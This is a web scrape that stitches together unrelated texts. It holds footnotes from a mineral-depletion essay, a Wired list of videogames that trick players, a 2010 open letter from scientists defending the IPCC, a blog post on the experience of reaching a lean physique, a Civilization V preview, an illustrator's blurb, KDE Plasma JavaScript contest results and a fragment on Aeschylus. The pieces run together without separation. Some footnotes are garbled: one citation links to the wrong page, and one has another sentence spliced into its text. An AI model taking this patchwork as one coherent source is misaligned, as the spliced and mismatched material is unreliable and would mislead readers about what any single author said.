( 11 ) For an explanation of the Verhulst logistics function and its applicability to projecting NNR depletion see – “ Depletion Theory ” , Dr. L. David Roper , 1976 - http://www.roperld.com/science/minerals/DepletTh.pdf and “ Verhulst Function for Modeling Mineral Depletion ” , Dr. L. David Roper , 2009 - http://www.roperld.com/science/minerals/VerhulstFunction.htm.
( 12 ) The projected 2030 annual global NNR extraction level was calculated by extrapolating the current ( 2007 or 2008 ) annual global NNR extraction level out to the year 2030 using the pre-recession ( 2000 - 2008 ) compound annual growth rate .
The projected peak global NNR extraction level was determined by applying Verhulst logistics modeling ( curve fitting ) to historic annual global NNR extraction level data and the USGS global NNR “ reserve base ” estimate ( the larger of the two USGS estimates of ultimately recoverable resources ) .
( 13 ) NNR price levels increased during the pre-recession years of the 21st century , thereby indicating that “ total ” global NNR supply , including recycled NNRs , failed to keep pace with total global NNR demand .
( 14 ) “ Continuously Less and Less — the New American Reality , pg. 12 , Chris Clugston , 2009 - http://www.wakeupamerika.com/PDFs/Continuously-Less-and-Less.pdf.
( 15 ) See “ Liebig ’s Law of the Minimum ” , Wikipedia - http://en.wikipedia.org/wiki/Rare_earth_element.
( 16 ) “ Continuously Less and Less — the New American Reality , pgs. 16- 19 , Chris Clugston , 2009 - http://www.wakeupamerika.com/PDFs/Continuously-Less-and-Less.pdf.
( 17 ) “ Continuously Less and Less — the New American Reality , pgs. 16- 25 , Chris Clugston , 2009 - http://www.wakeupamerika.com/PDFs/Continuously-Less-and-Less.pdf
( 18 ) See “ Continuously Less and Less — the New American Reality , pgs. 34 - 36 , for a discussion on America ’s impending societal collapse .
Conflicts over remaining natural resources , both NNRs and RNRs , will become increasingly prevalent on both national and international levels .
Chris Clugston , 2009 - http://www.wakeupamerika.com/PDFs/Continuously-Less-and-Less.pdf.
This April Fools ’
Day , we look back with a sick mixture of irritation and awe at the pranks played on us by the friends we least suspected : our videogames .
Videogames have a unique ability to suck us in :
We quickly suspend disbelief and immerse ourselves in the worlds that game designers create for us .
One of the first things we do is test the rules of the game to find out what results from our actions .
Armed with this knowledge , we set out to master the game ’s world .
But some game designers play with our expectations .
Sometimes they deliberately trick us by sending fake - out signals .
Sometimes they play on our assumptions about videogames , then show us that their game does n’t work the same as the rest .
Either way , we feel tricked — but to be surprised is to be entertained .
Here are Game|Life writers ’ 10 favorite ways that videogames have messed with our minds over the years .
Important Note : Big , big spoilers follow !
10 . Batman : Arkham Asylum
Batman ’s multiple encounters with Scarecrow , in which the mind - warping criminal played with our perceptions of reality , were the highlight of 2009 adventure Batman : Arkham Asylum .
Borrowing some parlor tricks from Eternal Darkness , the scenes included whispering voices and bugs on walls that were meant to mess with the player ’s mind .
The pièce de résistance was a lengthy sequence that made the game appear to crash , then restart .
As players cursed the buggy software , the gag became apparent when the scene showed the Joker checking Batman into the asylum , in a reversal of the game ’s real opening scene .
There ’s even a fake “ Game Over ” screen .
– Daniel Feit
9. Karateka
Contains spoilers !
Prince of Persia creator Jordan Mechner ’s first game , Karateka , gave us a few glimpses of the designer ’s playfulness — and his fondness for hidden traps .
One of the first things you learn while playing the game is to always approach enemies in your fighting stance , or else they ’ll kill your dumb defenseless ass with a single hit .
After fighting through a gauntlet of absurdly difficult enemy karate masters and defeating the evil Akuma , your beloved Princess Mariko awaits .
But if you approach her while still in the offensive stance , she responds to your aggro behavior by kicking you right in the dragon balls .
Lolz game over !
Reload your last save !
Oh wait , there is none , because it is 1984 .
– Chris Kohler
8. Castlevania : Symphony of the Night
Contains spoilers !
This 1997 PlayStation game let vampire hunters explore Dracula ’s massive castle at their leisure , wandering hither and yon in search of secrets .
But there was a catch : Should a player neglect to find a particularly out - of - the - way item before squaring off against Richter Belmont , Castlevania : Symphony of the Night comes to an abrupt end , with credits sequence and all .
Diligent players who figured there must be something more could break the spell over Richter and discover that the game was only half over .
Symphony ‘s second act — and the final battle with Dracula — takes place in an upside - down castle that some poor saps might never even have found .
– Daniel Feit
Image courtesy Miserable Pile of Secrets
7. Shadow of the Colossus
Contains spoilers !
When you arrive at the temple in the center of Shadow of the Colossus ‘ strange world and put your dead girlfriend on the altar , a disembodied spirit tells you that you can bring her back if you use your magic sword to kill the 16 colossi that roam the land .
Not a bad videogame plot , right ?
Joke ’s on you :
Eventually , you learn that what you were actually doing was helping break the seal on an evil spirit .
Every time you killed a colossus , a little chunk of that guy entered your body , and now you ’re a demon .
Eventually , an army of men slaughter you , just as you so ruthlessly killed the giants .
– Chris Kohler
Image courtesy Sony
6. Animal Crossing
Contains spoilers !
Nintendo ’s innovative life - simulation game Animal Crossing used the GameCube ’s internal clock , so whenever you entered your virtual village , your animal neighbors knew what day it was .
The persistent world meant you needed to remember to save your game before you turned it off .
Nintendo ’s way of reminding you was an obnoxious mole named Mr. Resetti .
If you reset the game , Resetti would pop out of the ground the next time you turned it on and lecture you about the dangers of quitting without saving .
It was a punishment .
You could n’t get back to your game until you paged through his minutes - long diatribe .
Sometimes he ’d even pretend to reset the game in his attempt to scare you straight .
– Chris Kohler
5. Super Mario Bros. 2
Contains spoilers !
Super Mario Bros. 2 , the Japanese sequel to Nintendo ’s breakout smash ( known as “ The Lost Levels ” elsewhere ) , begins just like the original :
You see some blocks to jump up and smash , and the very first row contains a happy - looking power - up mushroom .
“ Oh joy ! ” you think to yourself .
“ I am about to experience the familiar pleasures of a Mario game . ”
But this mushroom does n’t give you a free life or make you double in size .
Instead , it instantly kills you .
The Poison Mushroom is a bitter joke from the heartless sadists in Kyoto who designed the game , and the message is crystal - clear :
This is not going to be like the first Super Mario .
It ’s just a little taste of the agony that awaits in this brutally difficult sequel .
– Chris Baker
Image : Chris Kohler / Wired.com
4. BioShock
Contains spoilers !
Did n’t you love Atlas ?
With his charming Irish brogue and his sad life story , the narrator of BioShock helped you along throughout the game , giving you guidance and a friendly shoulder to lean on as you made your way through the ruins of Rapture .
Yes , Atlas was a perfect friend in every way — except for the fact that he did n’t exist .
He was actually Frank Fontaine , the game ’s true villain .
Oh , and also he was controlling your every action , making you do all sorts of bad things .
And you probably did them without even thinking about it , because he was just so gosh - darned nice .
– Chris Kohler
3. Eternal Darkness : Sanity ’s Requiem
Contains spoilers !
Eternal Darkness : Sanity ’s Requiem is one of the first games we think of when we think of pranks on the player , mostly because it was filled with them .
A horror story with a heavy H.P. Lovecraft influence , Eternal Darkness featured a “ sanity meter , ” a gauge of its protagonists ’ mental stability .
If their sanity dipped , the hapless characters would start having freaky hallucinations : Stately portraits on the walls would become gruesome death masks ; players ’ heads would fall off and they could pick them up and add them to their inventories ; etc .
But the best “ sanity effects ” were those directly targeting the player :
The screen would go blank with the word “ Video ” in the corner , as if the signal had been lost , and we ’d hear the character being attacked .
Sometimes jumping into the menu screen would bring up a dialog box that showed the player ’s saved games being deleted .
– Chris Kohler
2. Super Mario Bros. 3
Contains spoilers !
Princess Toadstool has a sick sense of humor .
In the first Super Mario Bros. , you traversed treacherous worlds to rescue her , only to hear that little bastard Toad say you got the wrong castle .
At the end of Super Mario Bros.
3 , she walks out and delivers the same old line , leading you to believe that there ’s another , even more difficult , castle ahead .
Assuming you have n’t smashed the console in anger at this point , the leader of the Mushroom Kingdom goes on to say that she was just messing with you .
Oh , real funny , lady .
Real funny .
– Chris Baker
1. Metal Gear Solid Series
Contains spoilers !
No single game creator has taken more pleasure in screwing with players than Hideo Kojima .
First there was the Psycho Mantis scene in Metal Gear Solid , in which he reads the player ’s memory card and tells them what other games they ’ve been playing .
This is followed by a boss fight in which the only way to win is to unplug the controller and insert it into the second player ’s slot .
But the real mindfuck — the single biggest joke ever played on gamers — was the entirety of Metal Gear Solid 2 .
Kojima told players it was another adventure starring supercool secret agent Solid Snake , but when everyone brought the game home , they found that the protagonist was actually whiny milquetoast Raiden .
Seriously , look at Metal Gear Solid 2 ‘s official European site .
Note that the entire thing is a lie .
Oh , we laugh about it now , 10 years later , but at the time all we wanted to do was hit Kojima in the face with a giant robot .
– Chris Kohler
Image : Konami
See Also :
Readers may recall this story last week :
Ad hoc group wants to run attack ads
Here ’s their formal response .
I ’m providing this from : http://www.openletterfromscientists.com for all to see here and to discuss .
– Anthony
An Open Letter from Scientists in the United States on the Intergovernmental Panel on Climate Change and Errors Contained in the Fourth Assessment Report : Climate Change 2007
[ Note : More than 250 scientists have already signed this open letter and signatures are still being collected .
On Friday , March 12 , 2010 , when the letter has been delivered to federal agencies , a list of signers will be posted .
The vast majority of the signers are climate change scientists who work at leading U.S. universities and institutions .
They include both IPCC and non-IPCC authors .
Additional signers include professionals from related disciplines , including physical , biological and social scientists .
If you are a scientist wishing to sign the letter , please see the note below .
If you have any questions , please contact the letter ’s authors , contact information is below . ]
Dear Colleagues :
We have written an open letter about the IPCC process , media attention , errors , and suggestions for improvement , which we are circulating to both IPCC authors and other scientists in the US .
We plan to send the letter to the US Congress , State Department , EPA , NOAA , the Office of Science and Technology Policy , the Council on Environmental Quality , and other relevant US agencies and organizations .
If you would like to be a co-signer of the letter , please send your name and institutional affiliation to Gary Yohe at gyohe@wesleyan.edu by close of business on Friday , March 12 .
A note on the letter will say : ‘ Signatories ’ affiliations are listed for identification only and should not be interpreted as representing official institutional positions . ’
Because it wo n’t be possible to coordinate multiple versions , we do not plan to edit this letter further at this juncture .
However , if you do have comments , please feel free to include them in your email response .
Please circulate the open letter to your colleagues if you would like .
We apologize for any cross-listings in advance .
Best ,
Gary Yohe
Steve Schneider
Cynthia Rosenzweig
Bill Easterling
***********************************************
Many in the popular press and other media , as well as some in the halls of Congress , are seizing on a few errors that have been found in the Fourth Assessment Report ( AR4 ) of the Intergovernmental Panel on Climate Change ( IPCC ) in an attempt to discredit the entire report .
None of the handful of mis-statements ( out of hundreds and hundreds of unchallenged statements ) remotely undermines the conclusion that “ warming of the climate system is unequivocal ” and that most of the observed increase in global average temperatures since the mid-twentieth century is very likely due to observed increase in anthropogenic greenhouse gas concentrations .
Despite its excellent performance for accurately reporting the state - of - the - science , we certainly acknowledge that the IPCC should become more forthcoming in openly acknowledging errors in a timely fashion , and continuing to improve its assessment procedures to further lower the already very low rate of error .
It is our intention in offering this open letter to bring the focus back to credible science , rather than invented hyperbole , so that it can bear on the policy debate in the United States and throughout the world .
We first discuss some of the key messages from climate science and then elaborate on IPCC procedures , with particular attention to the quality - control mechanisms of the IPCC .
Finally we offer some suggestions about what might be done next to improve IPCC practices and restore full trust in climate science .
The Climate Challenge
Our understanding of human contributions to climate change and the associated urgency for humans to respond has improved dramatically over the past two decades .
Many of the major components of the climate system are now well understood , though there are still sources of significant uncertainty ( like the processes that produce the observed rapid ice - sheet melting and / or collapse in the polar regions ) .
It is now well established , for example , that atmospheric concentrations of greenhouse gases from human sources have increased rapidly since the Industrial Revolution .
Increasing concentrations of greenhouse gases in the atmosphere reduce the heat going out of the climate system , i.e. , the radiation balance of the Earth – and so first principles of physics tell us to expect , with a very high likelihood , that higher temperatures should have been observed .
Indeed , measurements of global average temperatures show an increase of about 0.6 degrees C over the twentieth century and about 0.8 degrees C warming since mid-19th century .
The pattern of increase has not been smooth or monotonic .
There have been several 10 - to 15 - year periods of stable or declining temperatures over the past 150 years , but 14 of the warmest 15 years on record have been experienced between 1995 and 2009 .
Since 1970 , observational evidence from all continents and most oceans shows that many natural systems are already being affected by these temperature increases .
Because the long - term warming trends are highly significant relative to our estimates of the magnitude of natural variability , the current decadal period of stable global mean temperature does nothing to alter a fundamental conclusion from the AR4 : warming has unequivocally been observed and documented .
Moreover , well - understood lags in the responsiveness of the climate system to disturbances like greenhouse gas increases mean that the current temperature plateau will very likely not persist much longer .
Global climate model projections show that present - day greenhouse gas concentrations have already committed the planet to about 0.5 degree C in warming over this century .
Increasing emissions of carbon dioxide from the consumption of coal , oil and natural gas as well as deforestation have been the major drivers of this observed warming .
While we cannot predict the details of our climate future with a high degree of certainty , the majority of studies from a large number of research groups in the US and elsewhere project that unabated emissions could produce between 1 and 6 degrees C more warming through the year 2100 .
Other research has identified multiple reasons to be concerned about climate change ; these apply to the United States as well as globally .
They include ( 1 ) risks to unique and threatened systems ( including human communities ) , ( 2 ) risks from extreme events ( like coastal storms , floods , droughts , heat waves , and wildfires ) , ( 3 ) economic damages ( driven by , for example , pest infestations or inequities in the capacity to adapt ) , ( 4 ) risks from large - scale abrupt climate change ( e.g. , ice - sheet collapse , ocean circulation slowing , sharply increased methane emissions from permafrost ) or abrupt impacts of more predictable climate change ( generated by thresholds in the coping capacities of natural and human systems to climate variability ) , and ( 5 ) risks to national security ( driven largely by extreme events across the world interacting with already - stressed situations ) .
These sources of risk and the potential for triggering temperature - driven impacts at lower thresholds , as well as the explicit recognition in the AR4 that risk is the product of likelihood and consequence , led the nations of the world to take note of the Copenhagen Accord last December .
The Accord highlights 2 degrees C in warming as a target that might reduce the chance of “ dangerous anthropogenic interference with the climate system ” to more manageable levels .
Research has shown that increasing the likelihood of achieving this goal over the next century is economically and technically feasible with emission reduction measures and changes in consumption patterns ; but it will not be easy without major national and international actions to deviate substantially from the status quo .
The IPCC and the Fourth Assessment Report
The World Meteorological Organization ( WMO ) and the United Nations Environment Programme ( UNEP ) established the IPCC in 1988 to provide policy makers regularly with balanced assessments of the state of knowledge on climate change .
In so doing , they created an open intergovernmental organization in which scientists , policy analysts , engineers , and resource managers from all over the world were asked to collaborate .
At present , more than 150 countries including the United States participate in the IPCC .
IPCC publishes an assessment report approximately every six years .
The most recent Fourth Assessment , approved by member countries and released in 2007 , contained three volumes : The Physical Science Basis ( Working Group I ) ; Impacts , Adaptation and Vulnerability ( Working Group II ) and Mitigation of Climate Change ( Working Group III ) and a Synthesis Report .
More than 44 writing teams and 450 lead authors contributed to the Fourth Assessment – authors who have been selected on the basis of their expertise in consultation with all member countries and who were assisted by another 800 scientists and analysts who served as contributing authors on specific topics .
Authors donated their time gratis , and the entire process was supported by four Technical Support Units ( TSUs ) that employ 5 to 10 people each .
Errors in the Fourth Assessment Report
It was hard not to notice the extraordinary commotion that erupted around errors that were eventually found in the AR4 .
The wrong year for the projected disappearance of the Himalayan glaciers and the wrong percentage of ‘ land below sea level ’ in the Netherlands are examples of errors that need to be acknowledged frankly and rectified promptly .
In a few other cases , like the discussion of the correlations between crop yields , climate change , and climate variability in North Africa , caveats that were carefully crafted within the chapters were not included when language was shortened for the Synthesis Report .
While striving to simplify technical details and summarize major points , some important qualifications were left behind .
These errors of omission in the summary process should also be recognized and corrected .
Other claims , like the one reported at the end of February suggesting that the AR4 did not mention the millions of more people who will see increases in water availability that were reported in the cited literature along with the millions of more people who will be at risk of water shortage , are simply not true .
In any case , it is essential to emphasize that none of these interventions alter the key finding from the AR4 that human beings are very likely changing the climate , with far - reaching impacts in the long run .
The heated debates that have emerged around these instances have even led some to question the quality and integrity of the IPCC .
Recent events have made it clear that the quality control procedures of the IPCC are not watertight , but claims of widespread and deliberate manipulation of scientific data and fundamental conclusions in the AR4 are not supported by the facts .
We also strongly contest the impression that the main conclusions of the report are based on dubious sources .
The reference list of the AR4 contains about 18,000 citations , the vast majority of which were published in peer - reviewed scientific journals .
The IPCC also has transparent procedures for using published but not peer - reviewed sources in their reports .
These procedures were not properly followed in the isolated Himalaya case , but that statement was never elevated into the Summary for Policymakers of either Working Group II or the Synthesis Report – documents that were approved unanimously and word for word by all member nations .
Nonetheless , failsafe compliance with these procedures requires extra attention in the writing of the next round of assessments .
We propose implementing a topic - based cross-chapter review process by which experts in an impact area of climate change , such as changes in water resources , scrutinize the assessment of related vulnerability , risk analyses , and adaptation strategies that work downstream from such changes .
Here we mean , to continue the example , assessments of possible increases in flooding damage in river basins and the potential for wetlands to provide buffers in the sectoral and regional chapters .
This would be most productively implemented just before the first - order draft , so that chapter authors can be alerted to potential problems before the major review step .
Quality Control within the IPCC and US Review
The impression that the IPCC does not have a proper quality - control procedure is deeply mistaken .
The procedure for compiling reports and assuring its quality control is governed by well - documented principles that are reviewed regularly and amended as appropriate .
Even now , every step in the preparation of every chapter can be traced on a website : First Order Drafts ( with comments by many scientists as well as author responses to those comments ) , Second Order Drafts in which those comments are incorporated ( and comments by experts and country representatives on revised versions as well as another round of author responses ) , and so on , up through the final , plenary - approved versions .
To be clear , 2,500 reviewers together provided about 90,000 comments on the 44 chapters for the AR4 .
Each comment is documented on a website that also describes how and why the comment was or was not incorporated in the next revision .
Review editors for each chapter worked with the authors to guarantee that each comment was treated properly and honestly in the revision ; in fact , no chapter can ever move forward for publication without the approval of its set of two or three review editors .
The US Government opened its reviews of the draft IPCC report to any US expert who wanted to review it .
In order to protect against having this preliminary pre-reviewed draft leaked before its ultimate approval by the IPCC Plenary , the US Government asked all potential reviewers to agree not to disclose the contents of the draft .
For each report , the US Government assembled its own independent panel of government experts to vet the comments before submission to the IPCC .
Anything with scientific merit was forwarded .
There were multiple rounds for each of the Working Group reports and the Synthesis Report , and opportunities for US experts to review the drafts were posted as Federal Register notices .
IPCC principles also govern how authors treat published but non-peer reviewed sources .
These procedures acknowledge that peer - reviewed scientific journals contain little information about on - the - ground implementation of adaptation or mitigation – matters such as the emission reduction potential in a given industrial sector or country , for example , or catalogues of the specific vulnerabilities and adaptation strategies of sectors and regions with regard to climate change .
This information is frequently only available in reports from research institutes , reports of workshops and conferences , or in publications from industries or other non-governmental organizations .
This is the so - called gray literature .
The IPCC procedure prescribes that authors are obliged to assess critically any gray source that they wish to include .
The quality and validity of a finding from a non-peer reviewed source needs to be verified before its finding may be included in a chapter text .
Each source needs to be completely traceable ; and in cases where gray sources are used , a copy must be deposited at the IPCC Secretariat to guarantee that it is available upon request for third parties .
We conclude that the IPCC procedures are transparent and thorough , even though they are not infallible .
Nonetheless , we are confident that no single scholar or small group of scholars can manipulate the process to include or to exclude a specific line of research ; authors of that research can ( and are fully encouraged to ) participate in the review process .
Moreover , the work of every scientist , regardless of whether it supports or rejects the premise of human - induced climate change , is subject to inclusion in the reports .
The work is included or rejected for consideration based on its scientific merit .
It is important to note that we are not addressing here the criteria and procedures by which the IPCC selects chairs and authors .
These are handled exclusively by the IPCC and its members according to terms of reference that were initially defined in the authorizing language of 1988 .
That is to say , governments or their appointees frame and implement these policies ; and they create , approve and staff Technical Support Units for each working group .
We do not make suggestions on these topics since they lie beyond our purview .
What comes next ?
We expect that the robust findings of the AR4 will be continue to be supported by new information gleaned from literature published since 2006 — i.e. , that the climate change issue is serious and real .
Given these findings , we believe that the climate change issue deserves the urgent and non-partisan consideration of the country ’s legislative and administrative leaders .
We feel strongly that exaggerated focus on a few errors from 2007 cannot be allowed to detract from open and honest deliberations about how to respond to climate risk by reducing emissions and promoting adaptation at home and abroad .
As the process of producing the IPCC Fifth Assessment Report ( AR5 ) begins , the IPCC should become more responsive in acknowledging errors rapidly and openly as they become known .
To this end , we urge the IPCC to put an erratum on its website that rectifies all errors that have been discovered in the text after publication .
In doing so , a clear distinction needs to be made between errors and progressing knowledge .
IPCC assessments are detailed snapshots of the state of scientific knowledge at a given time , while knowledge evolves continuously through ongoing research and experience ; it is the errors in the assessments that need immediate attention .
In contrast , progressing knowledge is published in new scientific journal articles and reports ; this information should be used as a basis for the AR5 , but it cannot be listed as errata for the AR4 because it was not available when that assessment was conducted .
The website should , as well , respond rapidly and openly when reports of errors in past assessments are themselves in error .
We cannot let misperceptions fester anymore than errors go uncorrected .
Climate research and the IPCC reports on the state of knowledge provide a scientific foundation for climate policy making , whose agenda is defined by the governments of the IPCC and not the lead authors per se .
The quality of and the balance in the knowledge delivered by any assessment is certainly essential , as is clear and explicit communication of associated uncertainties .
Given the recent political and media commotion surrounding a few clear errors , it is now equally essential that we find ways to restore full trust in the integrity of the overwhelming majority of the climate change research and policy communities .
To that end , we are pleased that an independent critical evaluation of IPCC procedures will be conducted ; we hope that the process will solicit participation by the National Academies of the member nations .
The significance of IPCC errors has been greatly exaggerated by many sensationalist accounts , but that is no reason to avoid implementing procedures to make the assessment process even better .
The public has a right to know the risks of climate change as scientists currently understand them .
We are dedicated to working with our colleagues and government in furthering that task .
March 10 , 2010
Signed :
Gary W. Yohe Wesleyan University and Yale School of Forestry and Environmental Studies
gyohe@wesleyan.edu
Stephen H. Schneider Stanford University
shs@stanford.edu
Cynthia Rosenzweig NASA Goddard Institute for Space Studies and Columbia University
crosenzweig@giss.nasa.gov
William E. Easterling Pennsylvania State University
billeasterling@psu.edu
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
The anticlimax
The secret benefit of being lean
What 's the lesson here ?
I sometimes get asked how it " feels to be lean " or hear remarks like " it must be awesome to be lean all the time " .
I reply that I feel great and that being lean feels great .
But that 's not the whole truth .
People with a remote interest in fitness and health usually aspire to get lean and maintain that condition .
They may also assume that reaching a satisfactory or awe - inspiring condition will elevate their lives to a new level .
Much like people assume that winning the lottery will make their lives indefinitely better in just about every aspect .
In striving towards this goal , some people have an ideal body weight in mind .
Others may have a mental image of their physique or an arbitrary body fat percentage in mind .
Goals may vary a lot but expectations do not .
Once the goal is reached , everything will be great .
I was only slightly different than the Average Joe in this regard .
The difference being that I had been fairly lean for a good while .
Most people would probably settle for that perfectly respectable condition .
So while I did n't expect my life to improve much once I reached my ultimate goal , the goal was more like an itch that needed to be scratched until it went away .
And once the itch was gone , I think I expected that it would elevate me to new heights in some vague undefined ways .
I reached my goal a few days before Christmas 2007 .
It was a great anticlimax .
I was content and proud of myself for the fact that I finally conquered the goal I 've had for several years .
That I had reached a condition that I would be perfectly content to maintain rather than to seek constant improvement .
I decided this was good enough .
But the experience was disappointing in many ways .
Is this it ?
It left me with a sense of a void inside myself .
After all , I had invested a fair amount of energy in this over the years .
Mental energy first and foremost .
Having had to master thoughts of doubt ( Am I really losing body fat ?
Should I be cutting calories further ? ) .
Spending time thinking about how to tackle social events without affecting progress negatively .
At times having to exert restraint when cravings came .
In the final weeks maintaining the diet was not an issue .
Intermittent fasting made it a breeze relatively speaking .
But I was still plagued with doubt and worried whether I would reach my goal before Christmas .
I was adamant in reaching my goal before Christmas , since I wanted to switch to maintenance before the ensuing food fest on Christmas Eve .
Trust me , ending a diet on a holiday such as Christmas is a bad idea .
It was n't until after a few weeks that it dawned upon me what the real benefit of being lean is .
That is , lean enough for you to be completely content and happy about your physical condition .
Are you ready ?
Because I 'm about to reveal to you something that is rarely talked about .
Something few people might not understand before they 've been through the same experience .
The secret benefit of being lean is that it's an immense time saver .
Be honest with yourself : if you 're on a diet , you spend a fair amount of time thinking about it .
Being perfectly content saves up an astounding amount of mental energy .
Gone are the worries , doubts and obsessions about diet , weight and all other issues pertaining to reaching your goal .
The itch is gone .
No need to scratch it anymore .
But that void needs to be filled with something .
You will suddenly rediscover new interests and hobbies - I did .
Do n't fill the void with more training *.
Fill it with reading , family , friends or whatever you like .
Learn to be content once your ultimate goal is reached .
Set new goals ** , but learn to accept slower , gradual progress . *
Guys have a tendency to fill the void with more training in order to pack on more muscle once they consider themselves done dieting .
If they 're not dieting , they 're training themselves into the ground .
Yes , I used to be that guy a long time ago .**
I set a few new goals related to relative strength .
Progress in relative strength is in my opinion the best measure of lean muscle gain while maintaining low body fat .
After my experience , I tend to view fitness related goals as means to self - improvement , not happiness .
Setting goals and conquering them leads to a sense of achievement and it teaches you things about yourself .
If your " itch " is to achieve and maintain an extraordinary physique , getting there will make you a better person .
But not for the reasons you might initially think .
If the goal is of particular importance to you , as it was for me , it frees up an immense amount of time once the goal is reached - time that can be spent on improving yourself in other areas of life .
Related resources :
Civilization was never the most realistic game , and those who enjoyed battling against a nuclear - armed Gandhi have not minded .
The next one , Civilization V , though may be the most natural one thanks to some crafty tweaks .
Advertisement
Kotaku was shown an early version of development studio Firaxis ' Civ V running on a PC on the first day of Game Developers Conference here in San Francisco .
What was shown was a Civ that behaves just a little more like it is in the real world in regards to everything from terrain to the rules of war and international relations .
All have been modified to feel more true to life and more rife than ever with strategic potential .
The game is still a turn - based single or multiplayer quest requiring ample brainpower and planning .
Like other Civilization games , the player goal is to lead one tribe from the founding of a city to a position of global leadership , via military or peaceful means .
Advertisement
The most obvious difference is the look of Civ V's terrain .
As can be seen in screenshots it , looks more like real Earth .
A representative of the studio showing the game said this new Civ 's worlds might look pre-rendered but are still , true to the series , randomly generated .
An optional overlaid grid shows that the world is indeed divided into hexagons , a first for the series , which used to chop things up by squares .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
The ground looked good , lifted naturally by mountain ranges and cut by rivers .
As good as those graphics looked , the game is supposed to be able to run on the widest range of PC hardware specifications supported by the series yet , from laptops Civ fans use on planes to high - end PCs .
The current minimum spec Firaxis is hoping to accommodate are 256 MB video cards and dual core processors .
That target might change .
A lot of small changes have been made to the core Civ gameplay , tweaks that appear to have major implications .
Players get a notification system this time , which alerts them to important new events such as a new bit of research being completed or a scouting party being attacked .
Clicking on the alerts that appear on the right side of the screen , when relevant , warps the player to the location of the event .
Advertisement
Advisers are back in Civ V , characters who pop up to offer tips , Rival civilizations are now being programmed to fight with noticeably distinct artificial intelligence styles .
( Less consequential to gameplay is the introduction of full - screen animations of rival leaders such as George Washington or Napoleon , set in character specific locales ) .
Advertisement
New city states appear on the map .
These are always controlled by the computer .
Players can enter pacts with them , trade with them , or even attack them .
This complicates the relationships among the major civilizations , as an America that is friends with Budapest might be drawn into a war if it tries to free a besieged Budapest from the French .
The city states were described by one developer showing the game as elements that " are there to make things happen . "
A great civilization 's area of influence used to spread evenly in Civ games .
In the new one , a player will see the colored border representing the limits of their people 's reach expand in more realistic ways .
Turn after turn , the computer will automatically expand a player 's civilization into areas that have relevant resources , say forest instead of desert , early in the game .
Players can spend gold to speed the expansion .
Advertisement
Combat has changed .
Players will no longer be able to stack units onto one space and then carry that offensive stack to war .
Each unit — which still represents and is depicted by — a cluster of fighters , can only occupy a space on its own .
New ranged units can fire from afar ( an extra hexagon away for the archers , according to the demo this week ) .
And cities , which now have health bars , can fire back .
Advertisement
A number of other changes may be big or little .
It 's hard to say .
The developers said great civilizations can now agree to commence a research agreement , instead of just establishing trade or declaring war .
The game will now allow easy access to a catalogue of user - uploaded mods .
And , as a tease , the developers said there will be surprises as to how non-military ways of winning the game , the standard cultural and technological victories , for example , will be designed .
Civilization V , which appears to be a crafty evolution for the franchise , is set for release on PC this fall .
No Mac version is planned for launch , but the producer noted that all Civ games have eventually come out for Apple computers .
These are some illustrations I made for Malmberg Publishers .
They were made for a schoolbook .
Have a closer look on Flickr .
fdaenen
I ’m a Belgian illustrator .
Located 80 km ’s from Brussels .
I started working for a children ’s book publisher in 1999 .
I ’m currently working for all kind of publishers and magazines .
Have a look at my portfolio on Flickr or my Website .
Submissions for the Plasma Javascript Jam Session closed at the end of March and the judging commenced , with the community joining the judging panel as a collective " 5th member " .
Every Plasmoid that was submitted was a success and a joy to try out : congratulations to all of those who participated .
It was a competition with prizes up for grabs , however , so we had to make the required tough calls and declare some winners .
Without further ado , here are your 2010 Javascript Jam Session competition crown bearers !
Top 2010 Javascript Jammer : Ontje Lünsdorf with Aquarium
Combining clean code , good design and a fun idea , Ontje 's Aquarium claimed the top spot on the podium .
Maybe it was how it drove us to feed our fish hoping to breed the more elusive species or the nice implementation of the Boid algorithm that did the trick , but Ontje will be receiving a brand new Nokia N900 , an invite including airfare and lodging to a KDE event and a KDE T - Shirt for his efforts .
1st Runner Up : Nikita Melnichenko for Make Progress !
This clever Plasmoid is a technically solid , highly intuitive and very useful creation .
The judges found it easy to figure out how to use and the looks were outstanding .
Nikita will also be making progress of his own to a KDE event ( airfare and lodging included ) with his new KDE T - Shirt as a result !
2nd Runner Up : Manuel Unglaub's Shortlog
A simple and fresh approach to storing ( and finding ! ) those little snippets , notes and jewels , Shortlog shot Manuel into the 2nd runner up spot .
As with Make Progress ! , this Plasmoid captured attention for its easy of use and high utility .
Hopefully Manuel , inspired by the KDE T - Shirt he 'll be receiving for his efforts , will continue to explore the possibilities of his Plasmoid concept pushing it to new heights .
The Bragging Rights Titles
There were also three titles up for grabs that will entitle the creators of those Plasmoids bragging rights for 2010 .
The Beauty Queen title was reserved for the most stunning Plasmoid in form and function and was claimed by Petri Damstén for his Plasma Dice creation .
Petri demonstrated his artistic chops and a command of the animation framework to rise above the rest in this metric .
The first place winner , Aquarium , also earned Ontje the title of Technical Giant while the Creative Genius crown has been placed on Nikita 's brow for Make Progress !
All three of the bragging rights titles were close races , with Andrew Stromme 's Guitar Tuner and Shortlog coming in second more than once !
Kudos To All , And To All .. Start Thinking of Next Year ?
Each and every one of the contestents is a winner for participating and sharing the fruits of their passion and creativity with all of us .
We have a number of excellent new tools and toys to keep us busy and amuse us and the Plasma Javascript support has grown and improved as a result as well .
This year 's event was so successful that we are already seriously considering running another such competition next year , perhaps even extending it to runner plugins and DataEngines written in Javascript .
So keep your thinking caps nearby , those fingers dripping with Plasma and Javascript and hopefully we 'll see even more excellent submissions in 2011 !
Apologies in advance : line numbers are not exact .
The sons of Oedipus , Eteocles and Polyneices , were cursed by Oedipus for their ill - treatment of him .
Polyneices was supposed to rule Thebes , but Eteocles somehow gained rule and banished his brother .
So Polyneices , in exile , gets 6 other allies and storms Thebes ’ 7 gates .
Thebes repels the assault , killing all 7 enemy commanders , but loses Eteocles in the process .
This is no insignificant loss , as Eteocles directly engineered the victory and is even responsible , to a degree , for the political education of a good portion of the city .
Each of the enemy commanders had a shield with a different emblem ; Eteocles defeats each by selecting the appropriate man to oppose them .
Against Tydeus , whose shield has “ a fashioned sky afire with stars ” upon it , and a “ glorious full moon ” in the midst , Eteocles opposes a man literally of the earth , Melanippus ( ll. 388-390 , 410-415 ) .
It was said that Cadmus slew a monstrous serpent and the teeth of that serpent , sown , generated some of the Thebans ( Orwin 190 ) .
One could say that Tydeus has his head wholly in the stars ( 379-385 ) , whereas men , if they are indeed tied to earth for sustenance and generation , should recognize Earth as the source of justice and utility .
